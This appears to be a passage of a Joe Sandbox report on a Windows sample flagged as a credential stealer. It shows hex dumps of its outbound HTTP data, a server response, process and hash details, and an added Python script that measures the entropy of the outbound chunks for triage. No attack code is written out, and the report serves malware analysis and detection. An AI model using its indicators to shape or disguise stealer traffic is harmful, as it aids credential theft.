2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: d5 9f bb 65 9b 65 d2 d0 75 73 5b ab 46 55 6a 15 40 73 ed 19 28 56 f3 fd d5 7f 21 d9 f4 af d8 f3 2f e3 f9 74 6e 01 25 30 ae 95 74 4f f9 6f 7b d1 b7 59 fe 5c 88 75 e5 2f 82 14 5c 79 0c 8f 24 61 09 98 d8 60 f8 e0 a2 5a 29 77 d7 aa 81 96 3f ee 82 31 33 68 3b 89 87 1b 42 02 af a7 a2 9e ca 95 e8 7a e7 28 36 e9 6f ec 3a 2a 97 b8 d0 b0 82 af 30 cb ee cd fa 8c 7d 22 6c 29 13 51 0e 14 07 d9 a4 e4 dd 72 7e dc 12 66 d4 1b e0 72 e1 50 9a 80 51 33 7d 27 34 a1 d7 40 6e d2 6a a4 24 fe d6 fe 17 2c 87 61 12 25 e5 27 f8 a8 04 e6 b5 2f 3f 5a 7d fb f0 d6 d9 89 60 39 3d 84 34 fb 94 97 34 39 b3 3a 56 43 a9 e2 96 ee 4f 2b ee d4 de 98 39 41 1d 7c a7 c5 6b 52 ba b3 62 42 cc fe 1f eb 55 93 c9 cc f6 ed 77 61 7f e7 64 a2 ea 25 48 56 2c 33 0d ee 23 0f cd bd 81 1c 68 a2 ab d6 d5 95 fd
  Data Ascii: eeus[FUj@s(V!/tn%0tOo{Y\u/\y$a`Z)w?13h;Bz(6o:*0}"l)Qr~frPQ3}'4@nj$,a%'/?Z}`9=449:VCO+9A|kRbBUwad%HV,3#h
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: 91 c4 d0 2c d2 e5 42 ab 33 e3 4d bf 1c a8 4d 6f 5c 2f f0 1f 92 22 8d 6a df 95 d2 de 61 94 f4 30 56 05 73 41 1a 47 26 dc 4b e9 f7 f4 28 bf 08 92 fc 92 80 ad 27 ee ca 5d c7 4a c5 97 78 ad 6e 76 25 8a d5 da 4d d9 1e 48 9b 0c 9a 1b 71 85 20 69 b6 62 d9 78 29 40 98 f5 aa 80 bb 55 1f d6 e9 88 57 1e 07 22 6d 95 25 c9 3e c6 7b b2 3f fe ea 33 73 e9 32 33 4d 45 4b 01 37 2e a9 43 82 0d 61 21 0e 0d 0b 9e f1 e6 62 7d c2 df 86 64 9a ef f9 33 ba 52 88 a9 8a d9 49 f7 41 d2 f6 fd 3a c7 d4 d8 1b 0a 99 41 98 2b c7 75 b9 80 fe 8b a6 81 3d a3 1e 7b e3 4a 57 99 39 3a 82 b5 0c 85 8e 7f af 0d a4 eb e2 9c 61 a9 81 8b cf cb 79 37 d5 96 0b c2 a4 a0 8e 47 ee 69 68 c6 87 f0 e8 ab 24 3e b0 9e f3 28 8a f1 54 1b 70 7f c4 69 9a 0e 32 1b 84 eb bc f2 7c d9 bb 96 ed 98 b5 ab 6e 8d 7c a3 32
  Data Ascii: ,B3MMo\/"ja0VsAG&K(']Jxnv%MHq ibx)@UW"m%>{?3s23MEK7.Ca!b}d3RIA:A+u={JW9:ay7Gih$>(Tpi2|n|2
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: 33 f5 8f f3 1a 39 23 0d a4 ed b3 b1 fa c9 89 8d 44 03 a8 bd 44 f2 ce d6 3e 3d 7e 53 bd b4 3f c1 cc 73 dd 9b bc ab 6a f3 05 02 df ff 4b e0 5a da 54 d0 7a 2a 82 8f 89 98 e2 b7 67 d6 6a 87 d7 88 7f 70 6b c0 04 e6 56 0c 72 62 d0 51 21 0a 10 5d 01 22 40 f6 f7 5f 1b 03 9f a5 35 05 5e 90 5d 55 e1 76 ec 59 ae 79 24 a9 8a 84 aa bc 5d 26 18 a6 64 70 57 6a 7f 7f 94 c6 99 f0 da 81 e5 60 3a f5 51 34 bc 04 0d 16 bd aa da 8a d4 2a 96 fd ff 7d ce ff 7b a9 44 e8 35 42 a0 31 96 c2 0c 36 a0 7f 94 60 dc e8 8f 90 ff 47 86 ea ab 84 f3 04 8f de 04 ce a6 ff 17 19 28 c2 51 47 c1 17 05 49 0e 4c ff ca 9b 44 4e a2 43 a3 74 21 c0 cf 27 7e 27 44 07 65 de 22 57 99 45 10 71 ab 3b cf e4 0c 37 9d 8f 7e bc e0 66 46 4a 40 25 1f 81 cd 4f ba 19 bf 80 9b 8b 38 22 1b 97 4b ac e2 31 33 6f ba 58
  Data Ascii: 39#DD>=~S?sjKZTz*gjpkVrbQ!]"@_5^]UvYy$]&dpWj`:Q4*}{D5B16`G(QGILDNCt!'~'De"WEq;7~fFJ@%O8"K13oX
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: 6c 4c 82 e8 f7 94 18 27 31 20 68 37 e3 3e 0e 88 f7 84 72 33 c6 dd 26 78 40 8f 34 cc bb 69 00 c1 12 2c f9 bd 20 1f 87 5a f5 e6 22 9f d6 ce 4f 85 ba 0e 8c e4 9d 00 d9 f4 a6 3b 9b 9f f8 74 4b 37 6f c7 a7 c7 d5 2e 68 fb a7 93 4c 60 93 a0 29 fd fc e4 92 f5 1c e5 24 6f bd a8 75 0a 4c 09 32 f2 fc d8 e2 96 d2 32 97 c9 52 c6 52 2f 63 a4 34 88 24 a2 3a fa 03 b0 f5 64 21 b0 52 ec db ff 95 90 b0 70 86 a3 8e 6c b3 b1 67 23 71 6e df 41 6d d0 8e b5 02 56 4c 4b 10 27 35 8f e9 bb 1d a7 be c7 2f 2f ad b2 e2 2c 33 62 61 2d ea 13 3f 0b 42 19 f0 bc 2c c0 db 54 a6 4a 50 ba 50 78 23 67 5d 82 6b d4 91 93 ee 74 93 52 b6 df 1f 35 92 51 16 c1 ef 53 6c b8 01 1f 7e 4d bb d1 65 1c 52 f2 a8 94 11 af f9 8a 2a b5 fd a6 bb 31 1f 35 20 ec a8 a3 99 d4 84 af 37 77 24 9c 57 ca 2c c5 4d 8a 8c
  Data Ascii: lL'1 h7>r3&x@4i, Z"O;tK7o.hL`)$ouL22RR/c4$:d!Rplg#qnAmVLK'5//,3ba-?B,TJPPx#g]ktR5QSl~MeR*15 7w$W,M
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: 7e d7 5e 40 43 62 44 2a dd 47 2e 20 69 41 75 8b 3b 7c 57 d7 c6 a9 b5 7e ce d3 25 4d 25 b6 00 cb 70 1b a2 68 84 6b 74 06 3d 64 2a ad 7f 83 18 3d 5a c3 89 79 03 ce 5f 1a a8 aa c2 20 82 8b e1 f9 09 89 ad 35 04 0f c4 47 78 3d 45 10 05 57 a7 04 3e 51 dc c4 b8 9f d9 0f c4 a0 5f 0e f4 ed ca f4 fc 5a f4 09 b9 0a 05 99 59 91 39 f5 be 47 d4 42 21 ac a7 2f b2 6d 28 73 a6 a2 6e 41 f6 db d0 b3 2a ee fa 4b 11 5a 48 68 d7 d4 a1 e2 36 74 3a 8b fa 97 e0 c6 71 28 27 8a 18 19 7d 8c 46 33 43 45 c3 51 00 de 11 f4 e9 79 d3 32 63 34 7c f9 d3 73 43 fb 9a a5 43 18 d4 2c bf 50 d1 b7 33 9c 9f bf 2a de fe 3c 22 5f c9 43 82 82 c0 13 89 10 d1 02 dd 2a a9 67 4b ba 24 81 f8 76 83 d6 1e 84 db 6d 59 88 b6 1f 0d af f9 24 02 fa 05 04 ed 06 7f eb a9 9d 1f 42 df 35 cd 2e 6d 9f f1 69 15 c7 05
  Data Ascii: ~^@CbD*G. iAu;|W~%M%phkt=d*=Zy_ 5Gx=EW>Q_ZY9GB!/m(snA*KZHh6t:q('}F3CEQy2c4|sCC,P3*<"_C*gK$vmY$B5.mi
2024-12-28 08:40:56 UTC | 15331 | OUT | Data Raw: e5 f6 53 50 8e 86 3a c5 02 10 61 a3 12 29 80 dd 17 3c 28 ac 5c a1 48 53 a6 0d e7 27 ab 9b b5 e6 53 6e 4c ed 52 83 68 4f 59 4f 32 33 83 c0 68 9d f2 e3 da 79 04 cd f9 94 a5 5a a9 9c c7 3d cb 45 98 7c 07 a2 15 e7 f0 72 9b 03 28 09 5c 41 87 c6 a2 d0 ea e5 cb 1f 84 07 54 c4 e2 bf 35 66 28 f3 80 2e cd 35 18 03 8f 47 f5 3a 19 d2 68 02 d2 a4 96 9d b0 46 d0 cb e6 97 25 ff fc d3 a3 ff 28 c6 f1 88 af 6c 49 17 59 e5 3f 93 42 e2 f6 2e 05 df 91 83 7f 75 c9 82 fb dd 92 3a 0f 40 a9 c3 23 88 de d7 cd 4f 4f 92 04 fd 41 67 dc b6 d3 c0 d7 42 2f 10 88 e3 07 1c a3 2e 58 d0 dd 68 2e 92 c0 f3 12 91 76 16 94 3e 7b 9e 1a 38 73 54 bb 74 07 f0 ec 95 19 f4 0a eb 6b 8e 95 04 8f 47 eb 11 a0 4b 8b 8f 11 80 04 a7 8e 9c ad 77 3c 67 a9 9f e6 52 13 ac a9 4a d3 5b 49 39 89 b3 3e 69 58 34 90
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: e5 f6 53 50 8e 86 3a c5 02 10 61 a3 12 29 80 dd 17 3c 28 ac 5c a1 48 53 a6 0d e7 27 ab 9b b5 e6 53 6e 4c ed 52 83 68 4f 59 4f 32 33 83 c0 68 9d f2 e3 da 79 04 cd f9 94 a5 5a a9 9c c7 3d cb 45 98 7c 07 a2 15 e7 f0 72 9b 03 28 09 5c 41 87 c6 a2 d0 ea e5 cb 1f 84 07 54 c4 e2 bf 35 66 28 f3 80 2e cd 35 18 03 8f 47 f5 3a 19 d2 68 02 d2 a4 96 9d b0 46 d0 cb e6 97 25 ff fc d3 a3 ff 28 c6 f1 88 af 6c 49 17 59 e5 3f 93 42 e2 f6 2e 05 df 91 83 7f 75 c9 82 fb dd 92 3a 0f 40 a9 c3 23 88 de d7 cd 4f 4f 92 04 fd 41 67 dc b6 d3 c0 d7 42 2f 10 88 e3 07 1c a3 2e 58 d0 dd 68 2e 92 c0 f3 12 91 76 16 94 3e 7b 9e 1a 38 73 54 bb 74 07 f0 ec 95 19 f4 0a eb 6b 8e 95 04 8f 47 eb 11 a0 4b 8b 8f 11 80 04 a7 8e 9c ad 77 3c 67 a9 9f e6 52 13 ac a9 4a d3 5b 49 39 89 b3 3e 69 58 34 90
                                                                                                                                                                                                                                                                      Data Ascii: SP:a)<(\HS'SnLRhOYO23hyZ=E|r(\AT5f(.5G:hF%(lIY?B.u:@#OOAgB/.Xh.v>{8sTtkGKw<gRJ[I9>iX4
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: 89 67 df 7d 80 fe 3b 1f 70 ed 9b ec 59 8b ac 4a 52 9b 43 41 1f a4 72 86 6f 91 b5 6c d8 04 89 15 81 c7 03 84 f9 35 20 00 ab 6f 06 d1 36 a5 90 ef f6 d4 d6 3e 36 b1 6b 72 09 c3 93 41 6d c6 e7 4e 5e f6 49 e0 6d 5b f9 32 4f af 5c f5 3d 57 4f b2 c8 4c c7 7e 2c f1 18 17 7b af 04 c8 e9 d1 d7 c5 e7 23 ca 93 e6 b7 eb 3b 9c 11 8e 5b 77 03 bf 22 b3 a4 a5 f0 26 cf dc 57 52 82 e2 d0 15 19 13 39 26 f2 c6 a6 09 67 ed 45 39 83 6b 83 12 4e 16 e9 5a 90 90 20 7d 82 e3 f1 5b f9 cb 2e f6 5c 51 22 4b 69 f5 b4 06 65 69 26 92 2e 72 05 e0 33 71 9b c8 16 24 d7 48 93 e5 69 61 76 fc 2a 86 71 1d 37 5f b1 34 ea 71 07 90 b3 7a 89 55 ca 6c 17 4c 84 4c be 3f 49 64 58 4f e4 42 5f 46 09 7a 78 48 ec 52 fa d7 ea 63 31 b0 be e3 33 29 88 fc 20 74 92 57 e5 ba 13 d7 be b3 39 79 dd 44 5d d8 8c 5f
                                                                                                                                                                                                                                                                      Data Ascii: g};pYJRCArol5 o6>6krAmN^Im[2O\=WOL~,{#;[w"&WR9&gE9kNZ }[.\Q"Kiei&.r3q$Hiav*q7_4qzUlLL?IdXOB_FzxHRc13) tW9yD]_
                                                                                                                                                                                                                                                                      2024-12-28 08:40:56 UTC15331OUTData Raw: b4 64 99 13 87 4b 81 b7 5a 60 b5 f2 ce 99 aa 1f 13 d7 34 68 08 86 2f a1 60 58 cd 9b 41 0d 66 5a 84 8b 9b 69 f0 4a c1 b9 7c ed fe 42 6b 46 51 2b db 9c 29 6d 40 50 6b d6 85 10 ee bf 9d d1 84 57 89 82 d3 d6 0a e3 44 88 3c e5 55 4f 1a 5e 2a ac 88 de 4d 32 fe d2 5c 8e 56 84 e2 be d8 bb c1 ea 77 94 55 c3 30 61 81 6b b3 66 0f fb 76 3e aa 8a b9 b2 22 61 69 3e 2e f1 a3 b2 6f ad 75 32 3b 85 80 02 2a 3d 03 0f ff b5 72 e0 24 be 98 98 d2 00 47 9c 32 4b 08 9d 39 08 5f 60 91 92 e1 b0 40 c4 ba d7 c2 c4 d0 f3 d5 3c 1f ca 31 28 63 fb 53 1b 02 f6 84 16 ef b2 56 8e 29 86 ad dd 60 d7 c3 f4 ec 0d a4 5d e7 cb 6c 8f 7a 26 d4 33 1d 95 0e 09 7e 7c fd f5 2f 41 1b 65 21 e6 bc df c2 59 33 ca 14 8e 2e 5e 21 18 3a c9 9f e2 86 79 fd bc fa c7 66 e7 5b 9e f9 ce e0 9f 82 41 bb ea 3c 95 e6
                                                                                                                                                                                                                                                                      Data Ascii: dKZ`4h/`XAfZiJ|BkFQ+)m@PkWD<UO^*M2\VwU0akfv>"ai>.ou2;*=r$G2K9_`@<1(cSV)`]lz&3~|/Ae!Y3.^!:yf[A<
2024-12-28 08:41:00 UTC | 1135 | IN
HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:41:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=f65g6aqmq6v34c3eo5akmgv3c3; expires=Wed, 23 Apr 2025 02:27:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJQgWYtFHvKHcm7nnvVc8gFBhz8pL%2FMkJUU1BM%2BDKEPe95TVqo6TnsSjBvOEWwM6nPEc4omlRi0OAq2WpnrGOUpmYY%2FHS7SAIKbc6ofC2%2Fnjo29oBx7HiDf%2BMqV4nIKlMF4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f903f9b49dd176c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1501&rtt_var=570&sent=365&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573496&delivery_rate=1908496&cwnd=252&unsent_bytes=0&cid=955ebc3427ed82f5&ts=3590&x=0"
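Entropy triage of the outbound data records in the stream above, as an added example that is not part of the Joe Sandbox report or of the sample. It parses a `Data Raw:` line copied verbatim from the first outbound record above, scores the bytes with Shannon entropy and a chi-square test against a uniform byte distribution, and contrasts the result with a constructed plaintext form body. The 6.5 bits/byte cut-off and the contents of `PLAINTEXT_BODY` are assumptions for illustration, not values taken from the report.

```python
"""Entropy triage of Joe Sandbox 'Data Raw:' records.

Added example; not Joe Sandbox code and not code from the analysed sample.
REPORT_RECORD is copied from the first outbound record in the HTTP stream,
PLAINTEXT_BODY is a constructed contrast case, HIGH_ENTROPY is an assumption.
"""
import math
from collections import Counter

# Copied from the report: first outbound "Data Raw:" record, prefix included
# exactly as the report fuses it (timestamp, byte count, direction).
REPORT_RECORD = (
    "2024-12-28 08:40:56 UTC15331OUTData Raw: "
    "33 f5 8f f3 1a 39 23 0d a4 ed b3 b1 fa c9 89 8d "
    "44 03 a8 bd 44 f2 ce d6 3e 3d 7e 53 bd b4 3f c1 "
    "cc 73 dd 9b bc ab 6a f3 05 02 df ff 4b e0 5a da "
    "54 d0 7a 2a 82 8f 89 98 e2 b7 67 d6 6a 87 d7 88 "
    "7f 70 6b c0 04 e6 56 0c 72 62 d0 51 21 0a 10 5d "
    "01 22 40 f6 f7 5f 1b 03 9f a5 35 05 5e 90 5d 55 "
    "e1 76 ec 59 ae 79 24 a9 8a 84 aa bc 5d 26 18 a6 "
    "64 70 57 6a 7f 7f 94 c6 99 f0 da 81 e5 60 3a f5 "
    "51 34 bc 04 0d 16 bd aa da 8a d4 2a 96 fd ff 7d "
    "ce ff 7b a9 44 e8 35 42 a0 31 96 c2 0c 36 a0 7f "
    "94 60 dc e8 8f 90 ff 47 86 ea ab 84 f3 04 8f de "
    "04 ce a6 ff 17 19 28 c2 51 47 c1 17 05 49 0e 4c "
    "ff ca 9b 44 4e a2 43 a3 74 21 c0 cf 27 7e 27 44 "
    "07 65 de 22 57 99 45 10 71 ab 3b cf e4 0c 37 9d "
    "8f 7e bc e0 66 46 4a 40 25 1f 81 cd 4f ba 19 bf "
    "80 9b 8b 38 22 1b 97 4b ac e2 31 33 6f ba 58"
)

# Constructed contrast case (not from the report): the kind of plaintext
# form body an unencrypted check-in would send.
PLAINTEXT_BODY = b"user=alice&password=hunter2&domain=corp.example&" * 6

# Assumption: bits/byte above which a ~256-byte chunk is treated as
# encrypted or compressed. Random bytes of that length score about 7.2-7.3.
HIGH_ENTROPY = 6.5


def parse_data_raw(line: str) -> bytes:
    """Convert one 'Data Raw: 33 f5 ...' report line to bytes.

    Everything before 'Data Raw:' (timestamp, size, direction) is dropped,
    so lines can be pasted from the report as they appear.
    """
    _, sep, hexpart = line.partition("Data Raw:")
    if not sep:
        raise ValueError("not a Data Raw record")
    return bytes.fromhex("".join(hexpart.split()))


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 maximum)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chi_square_uniform(data: bytes) -> float:
    """Chi-square statistic of the byte histogram against a uniform distribution.

    With 255 degrees of freedom, random-looking bytes score near 255;
    text and other structured data score in the thousands.
    """
    n = len(data)
    if n == 0:
        return 0.0
    expected = n / 256
    counts = Counter(data)
    return sum((counts.get(b, 0) - expected) ** 2 / expected for b in range(256))


def classify(data: bytes) -> dict:
    """Summarise one chunk and say whether it looks encrypted/compressed."""
    h = shannon_entropy(data)
    printable = sum(32 <= b < 127 for b in data)
    return {
        "length": len(data),
        "entropy": round(h, 3),
        "chi_square": round(chi_square_uniform(data), 1),
        "printable_ratio": round(printable / max(len(data), 1), 3),
        "verdict": "encrypted/compressed" if h >= HIGH_ENTROPY else "plaintext-like",
    }


def triage_records(lines):
    """Run classify() over every 'Data Raw:' line in an iterable of report lines."""
    return [classify(parse_data_raw(line)) for line in lines if "Data Raw:" in line]


if __name__ == "__main__":
    for rec in triage_records([REPORT_RECORD]):
        print("report chunk:", rec)
    print("plaintext   :", classify(PLAINTEXT_BODY))
```

High entropy alone also describes compressed uploads and TLS payloads, so treat the verdict as a triage signal to be confirmed against the C2 host and the Suricata alerts the report lists. Pointing `triage_records()` at every `Data Raw:` line of the stream should show all chunks scoring alike, which is what an encrypted exfiltration stream looks like, whereas a plaintext body like the contrast case scores low on entropy, high on chi-square and fully printable.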



Target ID: 0
Start time: 03:40:33
Start date: 28/12/2024
Path: C:\Users\user\Desktop\k7T6akLcAr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\k7T6akLcAr.exe"
Imagebase: 0xda0000
File size: 2'951'680 bytes
MD5 hash: FCCB91D8F4EF18DA22C21583C82C56C0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2310705621.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Memory Dump Source
• Source File: 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp, Offset: 05592000, based on PE: false
• Associated: 00000000.00000003.2356777127.0000000005592000.00000004.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_5592000_k7T6akLcAr.2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bde1dcfb13d3496b6a064f86d846f92e7a0f188200fc66b37e29c5e572ece7de
• Instruction ID: 54dd0f26b1ed7580ce3e07d9bde69f5f00bc9b706d24402c3afaeafaeea0931c
• Opcode Fuzzy Hash: bde1dcfb13d3496b6a064f86d846f92e7a0f188200fc66b37e29c5e572ece7de
• Instruction Fuzzy Hash: CFC18CA540E7C29FCB178F38D96A7517F74AF1B214B1A0ADBC0D0CE5A7C159848AC753

Memory Dump Source
• Source File: 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp, Offset: 05592000, based on PE: false
• Associated: 00000000.00000003.2356777127.0000000005592000.00000004.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_5592000_k7T6akLcAr.2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8ff8a8f05a62bbe572c4ec5e24abc08504a8d35abac8d26fb32c359a0226ade9
• Instruction ID: 6013bf84cfed01bd55a9f231ab743d333b45d1b1d4e8d1ddccdefd366195f14e
• Opcode Fuzzy Hash: 8ff8a8f05a62bbe572c4ec5e24abc08504a8d35abac8d26fb32c359a0226ade9
• Instruction Fuzzy Hash: C1D198A284E3D18FD7178B7498766907FB0AE13224B1E45EBC4C4CF4A3E25D485AC7A3

Memory Dump Source
• Source File: 00000000.00000003.2353494330.0000000005592000.00000004.00000800.00020000.00000000.sdmp, Offset: 05592000, based on PE: false
• Associated: 00000000.00000003.2356777127.0000000005592000.00000004.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_5592000_k7T6akLcAr.2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f38cc164aed1cc81ce6fcc2840a065b4650e52e0b308ff492c2f4c5c11d4d0e3
• Instruction ID: 14951baa8a9fda9f1d2d5e1fab015d0a89e268ffde4eea6ce8100e62f6c80874
• Opcode Fuzzy Hash: f38cc164aed1cc81ce6fcc2840a065b4650e52e0b308ff492c2f4c5c11d4d0e3
• Instruction Fuzzy Hash: 7181113400D2D69FCB1BCF38CAA5A96BFB1BF43214B1D06DDD8C28E263C2696545C796